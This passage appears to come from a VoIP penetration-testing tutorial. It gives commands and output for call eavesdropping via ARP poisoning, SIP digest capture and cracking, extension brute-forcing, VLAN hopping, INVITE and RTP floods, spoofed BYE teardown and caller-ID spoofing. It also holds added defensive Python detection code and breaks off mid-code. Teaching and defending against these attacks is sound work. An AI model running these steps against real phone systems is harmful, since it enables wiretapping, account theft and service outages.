Now let's start capturing some traffic. While sniffing for traffic User B has launched the X-Lite softphone on his des
computer and dialed to user A extension 200.
Wireshark has captured some traffic, after a while I have stopped the capture process and saved the sessions into a file cal
sip.pcap.
We can see that we have captured the SIP traffic but for this section we are more interested in the RTP traffic because it c
actual conversation data.
Wireshark has a pretty cool feature to decode captured VoIP call data into a playable audio format. You can find this featur
Statistics > VoIP Calls menu.
VoIPong
VoIPong is a utility which detects all Voice over IP calls on a pipeline, and for those which are G711 encoded, dumps act
conversation to separate wave files. It supports SIP, H323, Cisco's Skinny Client Protocol, RTP and RTCP. VoIPong is lo
Backtrack /pentest/voip/voipong directory. Before we can use VoIPong we will need to make some changes to the voipo
file:
root@bt:/pentest/voip/voipong# nano etc/voipong.conf
soxpath = /usr/bin/sox
networksfile = /pentest/voip/voipong/etc/voipongnets
outdir = /pentest/voip/voipong/output/
device = eth0 # your network interface card name
Now we can start VoIPong to capture some VoIP conversations:
root@bt:/pentest/voip/voipong# ./voipong -c etc/voipong.conf -d4 -f
Once VoIPong detects a phone call it will start capturing it; once it finishes VoIPong will stop the capture process and will ren
playable wav file. All conversations will be saved into the /pentest/voip/voipong/output folder
Playing the file:
Vomit
Vomit converts a Cisco IP phone RTP conversation into a wav file that can be played with ordinary sound players. Vom
tcpdump output file. In order to get vomit up and running we will need to download and install waveplay. Get it here:
http://dir.filewatcher.com/d/FreeBSD/distfiles/Other/waveplay20010924.tar.gz.5731.html
root@bt:~# tar xzvf waveplay-20010924.tar.gz
waveplay-20010924/
waveplay-20010924/Makefile
waveplay-20010924/waveplay.c
waveplay-20010924/waveplay.ja.1
waveplay-20010924/wavefmt.h
waveplay-20010924/README
waveplay-20010924/waveplay.1
waveplay-20010924/README.jp
root@bt:~# cd waveplay-20010924
root@bt:~/waveplay-20010924# make
cc -c -o waveplay.o waveplay.c
cc waveplay.o -o waveplay
root@bt:~/waveplay-20010924# cp waveplay /usr/bin/
root@bt:/pentest/voip/vomit# ./vomit -r sip.dump | waveplay -S 8000 -B 16 -C 1
UCsniff
UCSniff is a VoIP & IP Video Security Assessment tool that integrates existing open source software into several useful
allowing VoIP and IP Video owners and security professionals to rapidly test for the threat of unauthorized VoIP and V
Eavesdropping. UCSniff supports Arp poisoning, VLAN Hopping, VLAN Discovery via CDP, it has sniffer capabilitie
more. I consider it an all in one eavesdropping tool. Let's take a look at some usage examples:
UCSniff can operate in 2 modes:
Monitor mode: Should be used on a shared media where the IP phones are connected to, i.e. a HUB, wireless acces
can also be used in a switched environment by setting up a SPAN session on a Cisco switch.
Man in the middle mode: This mode has 2 additional modes which are
Learning Mode
Targeted Mode
Preparing UCSniff so we can run it from any location in backtrack:
root@bt:/tmp# cd /pentest/voip/ucsniff/
root@bt:/pentest/voip/ucsniff# ./configure
root@bt:/pentest/voip/ucsniff# make
root@bt:/pentest/voip/ucsniff# make install
Monitor Mode Usage
root@bt:/tmp/ucsniff# ucsniff -i eth0 -M
UCSniff 2.1 starting
Running in Monitor Mode
File directory users.txt can't be opened for reading in working directory
File targets.txt can't be opened for reading in working directory
Listening on eth0... (Ethernet)
eth0 -> 00:0C:29:84:98:B2 192.168.1.105 255.255.255.0
Starting Unified sniffing...
Warning: Please ensure that you hit 'q' when you are finished with this program.
Warning: 'q' re-ARPs the victims. Failure to do so before program exit will result in a DoS.
SIP Call in progress. (extension 200, ip 192.168.1.104) calling (extension 201, ip 192.168.1.118)
SIP Call in progress. (extension 200, ip 192.168.1.105) calling (extension 201, ip 192.168.1.104)
SIP Call ended. Conversation recorded in file '200-Calling-201-5:2:73-both.wav'
SIP Call ended. Conversation recorded in file '200-Calling-201-5:2:82-both.wav'
Closing text interface...
Unified sniffing was stopped.
We can stop the session by pressing the Q key.
Several files were created by UCSniff: Log files: contain detailed information about SIP transactions. Pcap files: captur
which can be viewed in Wireshark. Audio wav files: conversation audio files.
root@bt:/tmp/ucsniff# ls -l
total 376
-rw-r--r-- 1 root root 40854 Feb 5 05:02 200-Calling-201-5:2:73-both.wav
-rw-r--r-- 1 root root 115818 Feb 5 05:02 200-Calling-201-5:2:73.pcap
-rw-r--r-- 1 root root 46294 Feb 5 05:02 200-Calling-201-5:2:82-both.wav
-rw-r--r-- 1 root root 103940 Feb 5 05:02 200-Calling-201-5:2:82.pcap
-rw-r--r-- 1 root root 278 Feb 5 05:02 call_detail_log
-rw-r--r-- 1 root root 317 Feb 5 05:02 call_log
-rw-r--r-- 1 root root 10063 Feb 5 05:02 sip.log
-rw-r--r-- 1 root root 39073 Feb 5 05:02 sipdump.pcap
-rw-r--r-- 1 root root 0 Feb 5 05:01 skinny_log
MITM Learning Mode Usage
This mode uses a signaling protocol (SIP, Skinny) to map extensions to IP Addresses. You can customize the targets to
intercept specific IP Addresses or Networks. In the following example we assume we are on the VoIP VLAN, UCSniff wi
poison all hosts on the subnet.
root@bt:/tmp/ucsniff# ucsniff -i eth0 // //
UCSniff 2.1 starting
Listening on eth0... (Ethernet)
eth0 -> 00:0C:29:84:98:B2 192.168.1.105 255.255.255.0
Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %
ARP poisoning victims:
GROUP 1 : ANY (all the hosts in the list)
GROUP 2 : ANY (all the hosts in the list)
Mapped new target entry: (IP: 192.168.1.118) -> extension 201 and name:
Mapped new target entry: (IP: 192.168.1.104) -> extension 200 and name:
SIP Call in progress. (extension 201, ip 192.168.1.118) calling (extension 200, ip 192.168.1.104)
SIP Call ended. Conversation recorded in file '201-Calling-200-5:13:42-both.wav'
Closing text interface...
ARP poisoner deactivated.
RE-ARPing the victims...
Unified sniffing was stopped.
If we take a look at the UCSniff log files we can see the discovered targets used in the attack.
root@bt:/tmp/ucsniff# cat targets.txt
192.168.1.118,201,,sip
192.168.1.104,200,,sip
MITM Target Mode
Target Mode enables Eavesdropping at a layer higher than just random audio streams or the IP address of phones for whic
know the extension. This mode has 2 sub modes: Targeted User and Targeted Conversation. We can add targets manually to th
targets.txt file in the following format: x.x.x.x,extension,,sip (for example 192.168.1.118,201,,sip) or use learning mode to auto disco
root@bt:/tmp/ucsniff# ucsniff -i eth0 -T
UCSniff 2.1 starting
File targets.txt can't be opened for reading in working directory
No targets have been previously discovered in Targets file, targets.txt
Please run UCSniff in learning mode, or manually edit targets.txt
Once a valid targets.txt file is found you will be asked to choose an eavesdropping mode:
root@bt:/tmp/ucsniff# ucsniff -i eth0 -T
UCSniff 2.1 starting
Parsed 2 entries in Targets file, targets.txt
UCSniff running in target mode. Parsed 2 previously discovered targets
Please select a Targeted Eavesdropping Mode:
1. User
Description: Eavesdrop on all calls to or from a particular endpoint.
2. Conversation
Description: Eavesdrop on bi-directional conversation flows between two selected endpoints.
Please select option (1) or (2):
Selecting "User" tells the tool to intercept all traffic between the one Target and the rest of the network.
In "Conversation", two endpoints are selected and the network is ARP Poisoned to only intercept the traffic between thos
UCSniff includes more useful tools and attack modes like VLAN hopping (using ACE) which will be discussed later.
Xplico
Although Xplico is not in the Backtrack voip tools directory, it is a very useful tool for capturing SIP and RTP traffic (am
protocols). Xplico can be found in the Backtrack > Digital Forensics > Forensic Analysis menu.
In case it is not present on your Backtrack installation you can simply install it by issuing the following command:
root@bt:~# apt-get install xplico
Xplico can be used to capture live traffic or to import a Wireshark PCAP capture file. Either way Xplico will decode the captured packets and assemble them into the appropriate format; in our case that will be SIP and RTP. After executing Xplico you will be asked to log in; the default username and password are: xplico
Once we have successfully logged in to Xplico we will need to create a case.
We will be asked to choose between a live capture or importing a PCAP file. In this example we will use Xplico to perform a live capture (we will ARP poison our targets in the background using arpspoof). Now we will have to choose our case and create a new session.
By choosing our newly created session we will see our main statistics page with the option to choose our network adapter and start/stop the capture process.
Here is an example of captured SIP traffic:
An example of RTP decoded traffic:
Capturing SIP Authentication using SIPDump
SIPDump is part of the SIPCrack tool suite; it allows performing a live capture of SIP authentication digest responses or dumping previously captured sessions from a PCAP file. SIPDump usage:
root@bt:/pentest/voip/sipcrack# ./sipdump -i eth0
SIPdump 0.3 (MaJoMu | www.codito.de)
Usage: sipdump [OPTIONS] <dump file>
<dump file> = file where captured logins will be written to
Options:
-i <interface> = interface to listen on
-p <file> = use pcap data file
-m = enter login data manually
-f "<filter>" = set libpcap filter
* You need to specify dump file
Live capture using SIPDump:
root@bt:/pentest/voip/sipcrack# ./sipdump -i eth0 auth.txt
SIPdump 0.3 (MaJoMu | www.codito.de)
* Using dev 'eth0' for sniffing
* Starting to sniff with packet filter 'tcp or udp or vlan'
* Dumped login from 192.168.1.104 -> 192.168.1.111 (User: '200')
* Dumped login from 192.168.1.104 -> 192.168.1.111 (User: '200')
* Dumped login from 192.168.1.104 -> 192.168.1.111 (User: '200')
Dumping authentication data from a PCAP file
root@bt:/pentest/voip/sipcrack# ./sipdump -p /root/registration.pcap auth.txt
SIPdump 0.3 (MaJoMu | www.codito.de)
* Using pcap file '/root/registration.pcap' for sniffing
* Starting to sniff with packet filter 'tcp or udp or vlan'
* Dumped login from 192.168.1.104 -> 192.168.1.101 (User: '200')
* Exiting, sniffed 1 logins
SIPDump will write the authentication challenge response to the specified file, which looks as follows:
192.168.1.111"192.168.1.104"200"asterisk"REGISTER"sip:192.168.1.104"44b80d16""""MD5"8edc2d549294f6535070439fb069c968
192.168.1.111"192.168.1.104"200"asterisk"REGISTER"sip:192.168.1.104"46cce857""""MD5"4dfc7515936a667565228dbaa0293dfc
192.168.1.111"192.168.1.104"200"asterisk"REGISTER"sip:192.168.1.104"2252e8fe""""MD5"5b895c6ae07ed8391212119aab36f108
We will discuss cracking these challenges in the Attacking Authentication chapter.
Attacking Authentication
SIP can be susceptible to 2 types of authentication attacks. Before we take a look at these attack types, let's understand how the registration and authentication process takes place. SIP uses digest authentication, which is the same mechanism the HTTP protocol uses and is known as HTTP digest. Because SIP is an ASCII based protocol, the authentication details are hashed in order to avoid transporting them in clear text. When a SIP client (User Agent) wants to authenticate with a SIP server, the server generates and sends a digest challenge to the client; it contains the following parameters:
Realm: used to identify credentials within a SIP message; usually it is the SIP domain.
Nonce: this is a unique MD5 string that is generated by the server for each registration request; it is made from a timestamp and a secret phrase to ensure it has a limited lifetime and cannot be used again.
Once the client receives the digest challenge and the user enters his credentials, the client uses the nonce to generate a digest response and sends it back to the server.
With that said, let's try to crack the digest response in order to obtain a valid SIP account password.
Cracking SIP Digest response hashes
Backtrack provides a great tool called SIPCrack. We already discussed how to capture a valid SIP authentication digest response using SIPDump. SIPCrack can be found in:
root@bt:/pentest/voip/sipcrack#
SIPCrack Usage:
root@bt:/pentest/voip/sipcrack# ./sipcrack
SIPcrack 0.3 (MaJoMu | www.codito.de)
Usage: sipcrack [OPTIONS] [ -s | -w <wordlist> ] <dump file>
<dump file> = file containing logins sniffed by SIPdump
Options:
-s = use stdin for passwords
-w wordlist = file containing all passwords to try
-p num = print cracking process every n passwords (for -w)
(ATTENTION: slows down heavily)
* Either -w or -s has to be given
SIPCrack can operate in two modes:
Dictionary attack
STDIN
Dictionary attack
Backtrack provides some basic dictionaries which are located in:
root@bt:/pentest/passwords/wordlists
But for the purpose of this article I will use another great tool in Backtrack called Crunch, which is used to create custom dictionaries. Let's use crunch to create a six character numeric dictionary. Crunch is located in:
root@bt:/pentest/passwords/crunch#
Crunch Usage:
usage: crunch <min-len> <max-len> [-f /path/to/charset.lst charset-name] [-o wordlist.txt] [-t [FIXED]@@@@] [-s startblock] [-c number]
For detailed crunch usage check its manual:
root@bt:/pentest/passwords/crunch# man crunch
Creating a six chars numeric dictionary:
root@bt:/pentest/passwords/crunch# ./crunch 6 6 -f charset.lst numeric -o /pentest/voip/sipcrack/sipass.txt
Crunch will now generate 7000000 bytes of data
Crunch will now generate 6 MB of data
Crunch will now generate 0 GB of data
100%
We will use the previously captured SIP credentials stored by SIPDump in the auth.txt file and sipass.txt as the dictionary (which we created using crunch).
Cracking the Digest Response:
root@bt:/pentest/voip/sipcrack# ./sipcrack -w sipass.txt auth.txt
SIPcrack 0.3 (MaJoMu | www.codito.de)
* Found Accounts:
Num Server Client User Hash|Password
1 192.168.1.101 192.168.1.104 200 3a33e768ed6f630347f4b511371926bd
* Select which entry to crack (1 - 1): 1
* Generating static MD5 hash... 0a84f78fde66bb15197eab961462dc2f
* Starting bruteforce against user '200' (MD5: '3a33e768ed6f630347f4b511371926bd')
* Loaded wordlist: 'sipass.txt'
* Starting bruteforce against user '200' (MD5: '3a33e768ed6f630347f4b511371926bd')
* Tried 123457 passwords in 0 seconds
* Found password: '123456'
* Updating dump file 'auth.txt'... done
Brute Force attack using John The Ripper
For this attack mode we will be using John the Ripper and redirect john's output into a FIFO file which we'll feed into SIPCrack.
Creating a FIFO file:
root@bt:/tmp# mkfifo sipcrack
Generating passwords using john and redirecting the output to our FIFO file; for this example we will generate up to 6 digits:
root@bt:~# john
[*] This script will take you to /pentest/passwords/jtr/
[*] From there, run ./john
root@bt:/pentest/passwords/jtr# ./john --incremental=digits --stdout=6 > /tmp/sipcrack
Using our FIFO file to crack the password:
root@bt:/pentest/voip/sipcrack# ./sipcrack -w /tmp/sipcrack auth.txt
SIPcrack 0.3 (MaJoMu | www.codito.de)
* Found Accounts:
Num Server Client User Hash|Password
1 192.168.1.111 192.168.1.104 200 8edc2d549294f6535070439fb069c968
* Select which entry to crack (1 - 1): 1
* Generating static MD5 hash... 0a84f78fde66bb15197eab961462dc2f
* Starting bruteforce against user '200' (MD5: '8edc2d549294f6535070439fb069c968')
* Loaded wordlist: '/tmp/sipcrack'
* Starting bruteforce against user '200' (MD5: '8edc2d549294f6535070439fb069c968')
* Tried 3 passwords in 0 seconds
* Found password: '123456'
* Updating dump file 'auth.txt'... done
Brute forcing SIP Accounts
We can use svcrack, which is part of the sipvicious tool suite, to brute force SIP accounts. A single SIP account dictionary attack (you can add -v or -vv for verbosity):
root@bt:/pentest/voip/sipvicious# ./svcrack.py -u200 -d wordlist.txt 192.168.1.104
| Extension | Password |
| 200 | 123456 |
A single SIP account brute forcing:
root@bt:/pentest/voip/sipvicious# ./svcrack.py -u200 -r100000-999999 192.168.1.104
| Extension | Password |
| 200 | 123456 |
Use ./svcrack.py -h for all available arguments.
VLAN Hopping
Usually VoIP traffic is connected to a dedicated VLAN (Virtual LAN), as we saw in the topologies section. This means that we cannot intercept the VoIP traffic by sniffing and ARP poisoning. The reason for that is that a VLAN is like a separate network with its own broadcast domain and a different IP range than the data network. VLAN hopping is a way to hop to another VLAN and, luckily for us, Backtrack includes the necessary tools to perform this attack. One common topology is where the IP phone has a built-in internal switch; usually the PC is plugged into the phone's PC socket and the ph<br>one is connected from its LAN/SW socket to the network switch as follows:
A typical CISCO switch port configuration for VoIP will look something like:
Switch# conf t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)# interface fastEthernet 0/1
Switch(config-if)# switchport mode access
Switch(config-if)# switchport access vlan 10
Switch(config-if)# switchport voice vlan 20
The IP phone will be configured with the appropriate VLAN ID (20) and the PC data traffic will flow through VLAN 10. To begin hopping around we will have to enable support for the 802.1q protocol in Backtrack by typing:
root@bt:~# modprobe 8021q
VoIP Hopper
VoIP Hopper is used to hop into the voice VLAN by behaving like an IP phone; it supports specific switches and some phone models. It currently supports brands like Cisco, Avaya and Nortel. VoIP Hopper was designed to run under Backtrack and currently has the following features: DHCP Client, CDP Generator, MAC Address Spoofing and VLAN hopping. VoIP Hopper usage:
root@bt:/pentest/voip/voiphopper# ./voiphopper
voiphopper -i <interface> -c {0|1|2} -a -n -v <VLAN ID>
Please specify 1 base option mode:
CDP Sniff Mode (-c 0)
Example: voiphopper -i eth0 -c 0
CDP Spoof Mode with custom packet (-c 1):
-D (Device ID)
-P (Port ID)
-C (Capabilities)
-L (Platform)
-S (Software)
-U (Duplex)
Example: voiphopper -i eth0 -c 1 -E 'SIP00070EEA5086' -P 'Port 1' -C Host -L 'Cisco IP Phone 7940' -S 'P00308800' -U 1
CDP Spoof Mode with pre-made packet (-c 2)
Example: voiphopper -i eth0 -c 2
Avaya DHCP Option Mode (-a):
Example: voiphopper -i eth0 -a
VLAN Hop Mode (-v VLAN ID):
Example: voiphopper -i eth0 -v 200
Nortel DHCP Option Mode (-n):
Example: voiphopper -i eth0 -n
VoIP Hopper provides many modes for attack; please use -h for detailed information.
Let's take a look at an example of sniffing for CDP and running a VLAN hop into the Voice VLAN in a Cisco environment. Run VoIP Hopper on the Ethernet interface in the following way:
root@bt:/pentest/voip/voiphopper# ./voiphopper -i eth0 -c 0
VoIP Hopper also allows one to VLAN hop to an arbitrary VLAN without sniffing for CDP. If you already know the Voice VLAN ID, or would like to VLAN hop into another VLAN, just specify the VLAN ID.
root@bt:/pentest/voip/voiphopper# ./voiphopper -i eth0 -v 20
VoIP Hopper 1.00 Running in VLAN Hop mode ~ Trying to hop into VLAN 20
Added VLAN 20 to Interface eth0
Attempting dhcp request for new interface eth0.20
eth0.20 Link encap:Ethernet HWaddr 00:0c:29:84:98:b2
inet6 addr: fe80::20c:29ff:fe84:98b2/64 Scope:Link
UP BROADCAST NOTRAILERS RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:9 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:2274 (2.2 KB)
ACE
ACE is another tool for VLAN hopping, very similar to VoIP Hopper in usage, and it also includes an option to discover TFTP servers (configuration servers). ACE Usage:
root@bt:/pentest/voip/ace# ./ace
ACE v1.0: Automated Corporate (Data) Enumerator
Usage: ace [-i interface] [-m mac address] [-t tftp server ip address | -c cdp mode | -v voice vlan id | -r vlan interface | -d verbose mode]
-i <interface> (Mandatory) Interface for sniffing/sending packets
-m <mac address> (Mandatory) MAC address of the victim IP phone
-t <tftp server ip> (Optional) tftp server ip address
-c <cdp mode 0|1> (Optional) 0 CDP sniff mode, 1 CDP spoof mode
-v <voice vlan id> (Optional) Enter the voice vlan ID
-r <vlan interface> (Optional) Removes the VLAN interface
-d (Optional) Verbose | debug mode
You can manually add a VLAN hop or use its discovery feature.
Mode to specify the Voice VLAN ID
Example: ace -i eth0 -v 96 -m 00:1E:F7:28:9C:8E
Mode to auto-discover the voice VLAN ID in the listening mode for CDP
Example: ace -i eth0 -c 0 -m 00:1E:F7:28:9C:8E
Mode to auto-discover the voice VLAN ID in the spoofing mode for CDP
Example: ace -i eth0 -c 1 -m 00:1E:F7:28:9C:8E
TIP: To view your MAC address in Backtrack use:
root@bt:~# macchanger -s eth0
It doesn't matter if you used voiphopper or ace; you can now intercept VoIP traffic with tools like ucsniff by specifying the newly created interface.
For example:
root@bt:/pentest/voip/ucsniff# ucsniff -i eth0.20 // //
Denial Of Service
A denial of service attack on VoIP services can render them useless by intentionally damaging the network and the availability of the VoIP systems. This attack can occur on two levels: standard network DoS attacks and VoIP specific DoS attacks. Generally the attacker will send tons of data by flooding the network to consume all its resources, or flood a specific protocol in order to overwhelm it with a large number of requests. Let's take a quick overview of the tools available in Backtrack.
Inviteflood
This tool can be used to flood a target with INVITE requests; it can be used to target SIP gateways/proxies and SIP phones.
root@bt:/pentest/voip/inviteflood# ./inviteflood
inviteflood - Version 2.0
June 09, 2006
Usage:
Mandatory -
interface (e.g. eth0)
target user (e.g. "" or john.doe or 5000 or "1+2105551212")
target domain (e.g. enterprise.com or an IPv4 address)
IPv4 addr of flood target (ddd.ddd.ddd.ddd)
flood stage (i.e. number of packets)
Optional -
-a flood tool "From:" alias (e.g. jane.doe)
-i IPv4 source IP address [default is IP address of interface]
-S srcPort (0-65535) [default is well-known discard port 9]
-D destPort (0-65535) [default is well-known SIP port 5060]
-l lineString line used by SNOM [default is blank]
-s sleep time btwn INVITE msgs (usec)
-h help - print this usage
-v verbose output mode
A basic usage syntax looks like this:
./inviteflood eth0 target_extension target_domain target_ip number_of_packets
As long as the tool keeps flooding the SIP gateway it will prevent users from making phone calls. You can flood the SIP proxy with an inexistent extension, thus making it generate a 404 not found just to keep it busy.
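Seen from the PBX, the svcrack password guessing in the Brute forcing SIP Accounts section and the INVITE flood described here look alike: a single source sends far more REGISTER or INVITE requests per unit of time than any phone ever does (a phone re-registers once per Expires interval, which is 3600 seconds in the 200 OK shown later on this page, and places a handful of calls). The following added example is not from the article or from any tool it covers: it runs a sliding-window rate check over constructed signaling events (timestamp, source IP, method, addressed user) and raises one alert per source and behaviour, separating password guessing against one extension from the REGISTER-based extension enumeration the Metasploit section below describes. The thresholds and the event shape are assumptions to adapt to your own SIP logs or IDS feed.

```python
from collections import defaultdict, deque
from dataclasses import dataclass


@dataclass(frozen=True)
class SipEvent:
    ts: float      # seconds since capture start
    src: str       # IP address the request came from
    method: str    # SIP request method: REGISTER, INVITE, ...
    user: str      # user part of the To URI, i.e. the extension being addressed


@dataclass(frozen=True)
class Alert:
    kind: str
    src: str
    ts: float      # time the threshold was crossed
    count: int     # requests inside the window at that moment


# Thresholds are assumptions for this example; tune them to the site.
REGISTER_WINDOW, REGISTER_THRESHOLD = 60.0, 20   # a phone registers once per Expires interval
INVITE_WINDOW, INVITE_THRESHOLD = 1.0, 50       # no phone places 50 calls per second


def detect(events):
    """Sliding-window rate detection per (source, method); one alert per source and kind."""
    windows = defaultdict(deque)      # (src, method) -> deque of (ts, user)
    alerts, fired = [], set()
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.method not in ("REGISTER", "INVITE"):
            continue
        span, threshold = ((REGISTER_WINDOW, REGISTER_THRESHOLD) if ev.method == "REGISTER"
                           else (INVITE_WINDOW, INVITE_THRESHOLD))
        win = windows[(ev.src, ev.method)]
        win.append((ev.ts, ev.user))
        while ev.ts - win[0][0] > span:     # drop events that fell out of the window
            win.popleft()
        if len(win) < threshold:
            continue
        if ev.method == "INVITE":
            kind = "sip-invite-flood"
        elif len({u for _, u in win}) > 1:  # many extensions from one source: enumeration
            kind = "sip-register-enumeration"
        else:                               # one extension, many attempts: password guessing
            kind = "sip-register-guessing"
        if (ev.src, kind) not in fired:
            fired.add((ev.src, kind))
            alerts.append(Alert(kind, ev.src, ev.ts, len(win)))
    return alerts


def sample_events():
    """Constructed traffic, not a real capture: one normal phone and two noisy sources."""
    ev = [SipEvent(0.0, "192.168.1.111", "REGISTER", "201"),
          SipEvent(3600.0, "192.168.1.111", "REGISTER", "201")]
    ev += [SipEvent(10.0 * i, "192.168.1.111", "INVITE", "200") for i in range(5)]
    # password guessing: 30 REGISTERs for extension 200 within nine seconds
    ev += [SipEvent(100.0 + 0.3 * i, "192.168.1.105", "REGISTER", "200") for i in range(30)]
    # extension enumeration: one REGISTER per candidate extension 100..149 in five seconds
    ev += [SipEvent(200.0 + 0.1 * i, "192.168.1.106", "REGISTER", str(100 + i)) for i in range(50)]
    # INVITE flood: 200 INVITEs inside one second
    ev += [SipEvent(500.0 + 0.004 * i, "192.168.1.105", "INVITE", "201") for i in range(200)]
    return ev


if __name__ == "__main__":
    for a in detect(sample_events()):
        print(f"{a.ts:8.3f}  {a.kind:26s} src={a.src} count={a.count}")
```

The windows are keyed per source and method, so a burst of REGISTERs and a flood of INVITEs from the same host produce two separate alerts, while the phone that registers once an hour and places a few calls never crosses either threshold. Response codes are deliberately not part of the input: a normal digest registration also begins with a 401 challenge, so counting 401s alone is a poor signal, whereas request rate per source is hard for any of the tools on this page to hide.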
Rtpflood
Rtpflood is used to flood a target IP phone with UDP packets containing RTP data. In order to launch a successful attack using rtpflood you will need to know the RTP listening port on the remote device you want to attack; for example the X-Lite softphone RTP port is 8000.
root@bt:/pentest/voip/rtpflood# ./rtpflood
usage: ./rtpflood sourcename destinationname srcport destport numpackets seqno timestamp SSID
Iaxflood
IAXFlood is a tool for flooding the IAX2 protocol, which is used by the Asterisk PBX.
root@bt:/pentest/voip/iaxflood# ./iaxflood
usage: ./iaxflood sourcename destinationname numpackets
Teardown
Teardown is used to terminate a call by sending a BYE request:
./teardown eth0 extension sip_proxy 10.1.101.35 CallID FromTag ToTag
First you will need to capture a valid SIP OK response and use its From and To tags and a valid Call-ID value.
SIP/2.0 200 OK
Via: SIP/2.0/UDP 192.168.1.105;branch=z9hG4bKkfnyfaol;received=192.168.1.105;rport=5060
From: "200";tag=hcykd
To: "200";tag=as644fe807
Call-ID: jwtgckolqnoylqf@backtrack
CSeq: 134 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Expires: 3600
Contact: ;expires=3600
Date: Tue, 01 Feb 2011 17:55:42 GMT
Content-Length: 0
If you specify the -v option you can see the payload:
SIP PAYLOAD for packet:
BYE sip:[email protected]:5060 SIP/2.0
Via: SIP/2.0/UDP 192.168.1.105:9;branch=91ca1ba598ee44d5917061c30981c565
From: <sip:192.168.1.104>;tag=hcykd
To: 200 <sip:[email protected]>;tag=as644fe807
Call-ID: jwtgckolqnoylqf@backtrack
CSeq: 2000000000 BYE
Max-Forwards: 16
User-Agent: Hacker
Content-Length: 0
Contact: <sip:192.168.1.105:9>
Spoofing Caller ID
There are several methods for spoofing Caller ID which we won't discuss here, because they require a different set of tools and equipment which are irrelevant to this article's purpose. Spoofing Caller ID in SIP is fairly easy; you just need to change the From header of the INVITE request.
INVITE sip:@127.0.0.1 SIP/2.0
To: <sip:192.168.1.104>
Via: SIP/2.0/UDP 192.168.1.104
From: "Evil Hacker"
Call-ID: 14810.0.1.45
CSeq: 1 INVITE
Max-Forwards: 20
Contact: <sip:127.0.0.1>
We will take a look at a tool we have already discussed called Inviteflood, which can be used to send spoofed INVITE requests:
root@bt:/pentest/voip/inviteflood# ./inviteflood eth0 201 192.168.1.104 192.168.1.104 1 -a "Backtrack"
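The teardown payload and the spoofed INVITE in the two sections above share one defensive lesson: a PBX or a monitoring sensor should not take a BYE or a From header at face value. The following added example (not from the article or from any tool it covers) is a small SIP header parser plus a dialog table. It learns a dialog from an INVITE and its 200 OK, then flags a BYE that carries the right Call-ID and tags but arrives from an address that never took part in the call, and it derives the caller ID from the registration bound to the sending address rather than from the From header. The messages are constructed for the example and modeled on the teardown payload shown on the page (same Call-ID and tags); the `registrations` map keyed by source IP is a simplification of a real registrar's binding table, and the `_msg` builder exists only to keep the samples short.

```python
import re
from dataclasses import dataclass, field


@dataclass
class SipMessage:
    start_line: str
    headers: dict = field(default_factory=dict)   # lower-cased header name -> value

    def get(self, name: str) -> str:
        return self.headers.get(name.lower(), "")

    @property
    def is_response(self) -> bool:
        return self.start_line.startswith("SIP/2.0 ")

    @property
    def method(self) -> str:
        """Request method, or for a response the method named in its CSeq."""
        return self.get("CSeq").split()[-1] if self.is_response else self.start_line.split()[0]


def parse_sip(raw: str) -> SipMessage:
    """Parse the start line and headers of one SIP message; the body is ignored."""
    head = raw.replace("\r\n", "\n").strip().split("\n\n", 1)[0]
    lines = [l for l in head.split("\n") if l.strip()]
    msg = SipMessage(lines[0].strip())
    for line in lines[1:]:
        name, _, value = line.partition(":")
        msg.headers[name.strip().lower()] = value.strip()
    return msg


def tag_of(header_value: str) -> str:
    m = re.search(r";tag=([^;\s]+)", header_value)
    return m.group(1) if m else ""


def via_host(msg: SipMessage) -> str:
    """Host the sender wrote into its topmost Via, e.g. 192.168.1.105 from '... UDP 192.168.1.105:9;branch=...'."""
    sent_by = msg.get("Via").split(";", 1)[0].split()[-1]
    return sent_by.rsplit(":", 1)[0]


class DialogTable:
    """Tracks established dialogs by Call-ID and checks that a BYE comes from a participant."""

    def __init__(self):
        self.dialogs = {}   # call-id -> {"tags": set of dialog tags, "peers": set of source IPs}

    def observe(self, raw: str, src_ip: str):
        """Feed one captured message with the IP it was seen from; returns a finding or None."""
        msg = parse_sip(raw)
        call_id = msg.get("Call-ID")
        tags = {t for t in (tag_of(msg.get("From")), tag_of(msg.get("To"))) if t}
        if msg.method == "INVITE" and not msg.is_response:
            self.dialogs[call_id] = {"tags": tags, "peers": {src_ip}}
        elif msg.method == "INVITE" and msg.start_line.split()[1] == "200":
            if call_id in self.dialogs:        # callee answered: learn its tag and address
                self.dialogs[call_id]["tags"] |= tags
                self.dialogs[call_id]["peers"].add(src_ip)
        elif msg.method == "BYE" and not msg.is_response:
            d = self.dialogs.get(call_id)
            if d is None:
                return f"BYE for unknown dialog {call_id} from {src_ip}"
            if tags != d["tags"]:
                return f"BYE with mismatched tags for {call_id} from {src_ip}"
            if src_ip not in d["peers"] or via_host(msg) != src_ip:
                return (f"BYE for {call_id} from {src_ip} (Via host {via_host(msg)}) "
                        f"is not from a participant {sorted(d['peers'])}")
            del self.dialogs[call_id]          # legitimate hang-up by a participant
        return None


def caller_id_for(raw_invite: str, src_ip: str, registrations: dict):
    """Caller ID policy: trust the registration bound to the sending address, not the From header.
    Returns (identity to display or None, warning or None)."""
    claimed = parse_sip(raw_invite).get("From").split(";")[0].strip()
    registered = registrations.get(src_ip)
    if registered is None:
        return None, f"INVITE from unregistered address {src_ip} claiming {claimed}"
    if claimed != registered:
        return registered, f"From {claimed} does not match registration {registered} of {src_ip}"
    return registered, None


def _msg(start, via, frm, to, cseq, call_id="jwtgckolqnoylqf@backtrack"):
    """Builder for the constructed sample messages below (Call-ID and tags taken from the page)."""
    return (f"{start}\r\nVia: SIP/2.0/UDP {via}\r\nFrom: {frm}\r\nTo: {to}\r\n"
            f"Call-ID: {call_id}\r\nCSeq: {cseq}\r\nContent-Length: 0\r\n\r\n")


# Constructed sample dialog: extension 201 at 192.168.1.111 calls 200 on the PBX 192.168.1.104.
INVITE = _msg("INVITE sip:200@192.168.1.104 SIP/2.0", "192.168.1.111:5060;branch=z9hG4bK-c1",
              '"201" <sip:201@192.168.1.104>;tag=hcykd', "<sip:200@192.168.1.104>", "1 INVITE")
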